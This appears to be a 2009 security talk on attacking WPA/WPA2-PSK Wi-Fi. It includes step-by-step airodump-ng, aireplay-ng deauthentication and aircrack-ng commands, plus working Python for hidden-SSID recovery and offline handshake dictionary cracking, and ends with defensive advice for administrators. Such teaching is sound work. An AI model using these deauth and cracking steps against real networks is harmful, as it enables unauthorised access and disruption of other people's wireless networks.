The A in WPA stands for Anarchy
Joshua Bedford, n0cturnal-labs.org, 2009
The tool box
BackTrack 3 (can be booted off USB or CD, or run as a VMware image)
BT3-supported Wi-Fi card: I use the AirLink101 AWLL3055 USB adapter, which comes with a 10 dBi antenna. The chipset is ZyDAS, fully supported under Linux.
Dictionary password attack (2.3 GB dictionary file)
Extra hardware highly recommended
Alfa 500 mW USB Wi-Fi dongle (high-powered USB Wi-Fi dongle, fully supported under BT3), with an RP-SMA connector for aftermarket antennas
RP-SMA male to N male pigtail
19 dBi 2.4 GHz panel antenna
Pasadena Networks carries both the card and aftermarket antennas. I would highly recommend getting this gear.
WPA – What is it?
Wi-Fi Protected Access: a security protocol for 802.11 wireless networks, more or less a patch to fix the flawed WEP protocol while still running on WEP-era hardware. WPA provides additional security by:
Requiring authentication, either through 802.1X (WPA-Enterprise) or a pre-shared key (WPA-Personal)
Re-keying with TKIP (Temporal Key Integrity Protocol), which derives a fresh per-packet key instead of WEP's static key
Augmenting the ICV (Integrity Check Value) with a MIC (Message Integrity Check, "Michael") that protects the header as well as the payload
Implementing a sequence counter so that replayed frames are rejected, an attack that works against WEP
WPA2 – What is it?
(Wi-Fi Protected Access 2) provides network administrators with a higher level of assurance that only authorized users can access the network. Based on the ratified IEEE 802.11i standard, WPA2 replaces TKIP with the National Institute of Standards and Technology (NIST) FIPS 140-2 approved AES cipher in CCMP mode. Two versions exist, Personal and Enterprise. Personal (WPA2-PSK) protects against unauthorized access with a pre-shared key, a passphrase of 8 to 63 characters configured on the AP and every client. Enterprise authenticates users against a RADIUS server over 802.1X. WPA2 is backward compatible with WPA (an AP can run in mixed WPA/WPA2 mode). The dictionary and rainbow-table attacks in this talk apply equally to WPA-PSK and WPA2-PSK: the cipher changed, the passphrase-to-key derivation did not.
Wireless Protection Myths
Mac Filtering
MAC address filtering is an allow list of clients that may associate to a specific AP (or a deny list of clients that may not).
MAC addresses can be spoofed very easily: anyone sniffing in monitor mode sees the MACs of associated clients in clear and can set one of them on their own card.
Mac Spoofing Tools
SMAC – Windows
Makeup MAC – Windows
MadMAC – Windows
MacShift – Windows
EtherChange – Windows
Technitium MAC Changer – Windows
GNU MAC Changer (macchanger) – Linux
Hidden SSID’s
A hidden SSID is an AP name that is not broadcast in beacon frames. Most site-survey wireless applications will not display a hidden AP. We can grab the hidden SSID when an authorized PC on that network connects: the wireless client sends a probe request and an association request that carry the SSID in clear, so anyone sniffing the channel sees it. A few tools for both Windows and Linux will display hidden SSIDs:
Windows – AirMagnet and AirSnort
Linux – Kismet, airodump-ng, and AirJack
Note: a port of Kismet for OS X exists, called KisMAC
Airodump – Hidden SSID
Kismet – Hidden SSID
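What airodump-ng and Kismet do when they fill in a hidden SSID is shown below as an added example; it is not the talk's code nor either tool's. It parses constructed 802.11 beacon and association request frames (radiotap headers assumed already stripped), marks a BSSID as hidden when its beacon carries a blank SSID element, and takes the real name from the SSID element of a client's association request. The MAC addresses and the SSID "n0cturnal" are made up.

```python
"""Recover a hidden (non-broadcast) SSID from 802.11 management frames.
Added example, not the talk's code: airodump-ng/Kismet do this on a live
monitor-mode capture; here the frames are constructed and the radiotap
header is assumed to be already stripped."""

MGMT = 0                                   # 802.11 frame type: management
ASSOC_REQ, REASSOC_REQ, BEACON = 0, 2, 8   # management subtypes we care about
SSID_IE = 0                                # information element tag for SSID


def parse_ies(data: bytes):
    """Split an information-element list into (tag, value) pairs; stop at a truncated element."""
    ies, i = [], 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        if i + 2 + length > len(data):
            break
        ies.append((tag, data[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def parse_mgmt(frame: bytes):
    """Return {'subtype','sa','bssid','ies'} for beacon / (re)association request frames, else None."""
    if len(frame) < 24:                    # 24-byte management header
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != MGMT:
        return None
    subtype = (fc >> 4) & 0xF
    sa, bssid = frame[10:16], frame[16:22]  # addr2 = transmitter, addr3 = BSSID
    body = frame[24:]
    # Skip the fixed fields that precede the IEs for each subtype.
    if subtype == BEACON:
        body = body[12:]                   # timestamp(8) + beacon interval(2) + capability(2)
    elif subtype == ASSOC_REQ:
        body = body[4:]                    # capability(2) + listen interval(2)
    elif subtype == REASSOC_REQ:
        body = body[10:]                   # capability(2) + listen interval(2) + current AP(6)
    else:
        return None
    return {"subtype": subtype, "sa": sa, "bssid": bssid, "ies": parse_ies(body)}


def ssid_ie(parsed):
    for tag, value in parsed["ies"]:
        if tag == SSID_IE:
            return value
    return None


def is_hidden(ssid) -> bool:
    """Hidden APs beacon a zero-length SSID or one padded with NUL bytes."""
    return ssid is not None and all(b == 0 for b in ssid)


def recover_hidden_ssids(frames):
    """Beacons with a blanked SSID mark a BSSID as hidden; an association request
    to that BSSID carries the real SSID in clear, which is what we harvest."""
    hidden = {}        # bssid -> recovered SSID, or None until a client associates
    for frame in frames:
        p = parse_mgmt(frame)
        if p is None:
            continue
        ssid = ssid_ie(p)
        if p["subtype"] == BEACON and is_hidden(ssid):
            hidden.setdefault(p["bssid"], None)
        elif p["subtype"] in (ASSOC_REQ, REASSOC_REQ) and p["bssid"] in hidden and ssid:
            hidden[p["bssid"]] = ssid.decode("utf-8", errors="replace")
    return hidden


# --- constructed frames (made-up MACs and SSID, not from a real capture) -----------
def mgmt_frame(subtype, addr1, addr2, addr3, body):
    fc = bytes([(subtype << 4) | (MGMT << 2), 0])
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def ie(tag, value):
    return bytes([tag, len(value)]) + value


AP = bytes.fromhex("00aabbccddee")
CLIENT = bytes.fromhex("001122334455")
BROADCAST = b"\xff" * 6
RATES = ie(1, b"\x82\x84\x8b\x96")
HIDDEN_BEACON = mgmt_frame(BEACON, BROADCAST, AP, AP,
                           b"\x00" * 8 + b"\x64\x00" + b"\x11\x04" + ie(SSID_IE, b"") + RATES)
CLIENT_ASSOC = mgmt_frame(ASSOC_REQ, AP, CLIENT, AP,
                          b"\x11\x04" + b"\x0a\x00" + ie(SSID_IE, b"n0cturnal") + RATES)

if __name__ == "__main__":
    print(recover_hidden_ssids([HIDDEN_BEACON]))                # AP -> None (hidden, no name yet)
    print(recover_hidden_ssids([HIDDEN_BEACON, CLIENT_ASSOC]))  # AP -> 'n0cturnal'
```

The point to take from the walk: the AP never has to reveal the name, the client does it for the AP on every (re)association, which is why a deauth (next section) also doubles as a way to force a hidden SSID into the air.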
WPA known attacks
Deauthentication Attack
This attack only works if a legitimate client is connected to the AP of interest. The deauthentication frames knock the client off the AP; when it reconnects, the WPA 4-way handshake is sent again and airodump-ng captures it. The handshake is written to a capture file, which can then be attacked offline with either a brute-force or a dictionary attack. The card must be in monitor mode first (airmon-ng start (interface)); the commands below use eth1 as the interface name.
Deauthentication Attack
Command: airodump-ng eth1 (this lists all APs; select your target)
Deauthentication Attack
Command: airodump-ng -c (chan) -w (file name) --bssid (bssid) eth1
Deauthentication Attack
Command: aireplay-ng -0 5 -a (bssid) eth1
Note that airodump-ng is still running in the background while we send the deauth frames (-0 5 sends five rounds; without -c (client mac) they are broadcast to every client of the AP). If all went well, "WPA handshake: (bssid)" appears in the top line of the airodump-ng session.
Deauthentication Attack
Now you can close aireplay-ng; the WPA handshake is shown in the airodump-ng screen. Note that the capture file is written to whatever directory you ran airodump-ng from, as (file name)-01.cap. Exit airodump-ng and follow the next set of instructions at the bash prompt.
Deauthentication Attack
Command: aircrack-ng -w (dictionary file) (file name of the .cap created by airodump-ng)
Deauthentication Attack
KEY FOUND! [1026 keys tested] BOOM!
Rainbow Table Attack
This is a precomputed table of WPA PMKs for the top 1000 SSIDs from wigle.net, built from a wordlist that merges the Webster dictionary with common passwords. Thanks to the Church of WiFi.
WPA PSK Rainbow table (Shmoo Group)
Note: this rainbow table attack will only work against APs whose SSID is in the top 1000 SSID list. The PMK is derived from the passphrase and the SSID together (the SSID is the salt), so a table computed for one SSID says nothing about a network with a different name, and a non-default SSID defeats it entirely.
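The offline aircrack-ng step above and the rainbow-table idea come down to the same arithmetic, shown here as an added Python example (not the talk's code and not aircrack-ng's): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), the PTK from the 802.11i PRF over the two MACs and the two nonces, and the MIC over EAPOL-Key message 2 (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP) compared against the captured MIC. The SSID, MACs, nonces, the passphrase "dictionary", the wordlist and the EAPOL frame are all constructed; a real run takes them from the .cap.

```python
"""WPA/WPA2-PSK offline dictionary attack against a captured 4-way handshake,
plus the per-SSID PMK precomputation that a WPA "rainbow table" relies on.
Added example, not the talk's or aircrack-ng's code; only hashlib/hmac needed."""
import hashlib
import hmac

MIC_OFFSET, MIC_LEN = 81, 16    # MIC field of an EAPOL-Key frame: bytes 81..96


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). This is the slow step,
    # and the SSID is the salt, which is why a precomputed table is tied to one SSID.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce, length=64) -> bytes:
    # IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    #   min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # MIC = HMAC(KCK, EAPOL-Key frame with the MIC field zeroed), truncated to 16 bytes.
    # Key descriptor version (low 3 bits of Key Information, bytes 5..6):
    #   1 -> HMAC-MD5 (TKIP / WPA), 2 -> HMAC-SHA1 (CCMP / WPA2).
    version = eapol[6] & 0x07
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes, version: int = 2) -> bytes:
    # Minimal constructed EAPOL-Key message 2 with the MIC zeroed: EAPOL header, descriptor
    # type 2 (RSN), Key Info (pairwise|MIC|version), key length, replay counter, SNonce,
    # IV, RSC, ID, MIC, key data length 0.
    key_info = 0x0108 | version
    body = (b"\x02" + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * MIC_LEN + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol, candidates, pmk_table=None):
    # Per candidate: PMK (slow PBKDF2, or a table lookup) -> KCK = PTK[0:16] -> MIC == captured MIC?
    captured = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for word in candidates:
        if not 8 <= len(word) <= 63:      # WPA-PSK passphrases are 8..63 characters; skip the rest
            continue
        pmk = pmk_table[word] if pmk_table is not None else pmk_from_passphrase(word, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured):
            return word
    return None


def precompute_pmk_table(ssid, words):
    # The rainbow-table idea: pay the PBKDF2 cost once per (SSID, word); every later handshake
    # on that SSID then costs only the cheap PRF + HMAC check per candidate.
    return {w: pmk_from_passphrase(w, ssid) for w in words if 8 <= len(w) <= 63}


# Constructed handshake parameters (made up, not from a real capture).
SSID = "linksys"
AA = bytes.fromhex("001122334455")      # AP BSSID
SPA = bytes.fromhex("66778899aabb")     # client MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "dictionary"
WORDLIST = ["password", "12345678", "qwerty", "dictionary", "letmein1"]


def make_captured_frame(passphrase=TRUE_PASSPHRASE, ssid=SSID, version=2):
    # Simulate what the client sends in message 2: the frame with the real MIC filled in.
    frame = build_eapol_msg2(SNONCE, version)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), AA, SPA, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


if __name__ == "__main__":
    capture = make_captured_frame()
    print("dictionary attack:", crack_handshake(SSID, AA, SPA, ANONCE, SNONCE, capture, WORDLIST))
    table = precompute_pmk_table(SSID, WORDLIST)
    print("table, same SSID:", crack_handshake(SSID, AA, SPA, ANONCE, SNONCE, capture, WORDLIST, table))
    other = make_captured_frame(ssid="MyHomeNet")
    print("table, other SSID:", crack_handshake("MyHomeNet", AA, SPA, ANONCE, SNONCE, other, WORDLIST, table))
```

The last call is the whole story of the Church of WiFi tables: a PMK table built for one SSID is worthless against a network with any other name, because the SSID is the salt, and an uncommon SSID means no table exists for you at all. Everything after the PBKDF2 step is cheap, so the table turns a per-candidate cost of 4096 HMAC-SHA1 rounds into one lookup.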
Closing thoughts
So it's up to you, the administrator, to use long passphrases (WPA-PSK allows up to 63 characters) with mixed character classes and substitutions, and a non-default SSID. A long random passphrase is out of reach of brute force, a dictionary attack only succeeds when the passphrase is in the dictionary, and an uncommon SSID means no precomputed table exists for your network.
Shout outs!
deadhexbigdan[ruiner]cipherth0t
alpenht7zatmevild
n0cturnal-labs.org
grayscale-research.org